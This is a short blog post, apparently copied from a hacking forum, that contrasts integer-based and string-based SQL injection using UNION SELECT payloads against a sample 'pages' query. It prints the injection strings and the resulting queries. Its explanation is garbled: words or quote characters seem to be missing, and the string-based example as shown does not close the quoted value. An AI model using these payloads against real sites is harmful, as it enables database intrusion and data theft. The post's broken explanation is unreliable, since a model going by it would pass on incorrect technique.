Showing posts with label injection. Show all posts
Showing posts with label injection. Show all posts
Wednesday, May 24, 2017
Difference between integer based and string based SQL injection
Difference between integer based and string based SQL injection
Hi friends this one i had posted a question on hackforums about difference between string based and integer based SQL injection it can be explained as follows
integer
SELECT * FROM pages WHERE page_id=10 [inject] order by title limit 1,1 ?id=10 union select 1,2,3--
finallly you get
SELECT * FROM pages WHERE page_id=10 union select 1,2,3-- order by title limit 1,1
string
SELECT * FROM pages WHERE page_id="10" [inject] order by title limit 1,1 ?id=10 union select 1,2,3--+
final:
select * from pages where page_id="10" union select 1,2,3--+ order by title limit 1,1
so in integer based SQL injection you dont have to put a and in string based SQL injection you have to put a and a + sign at the end
the original post here
enjoy
Subscribe to:
Posts (Atom)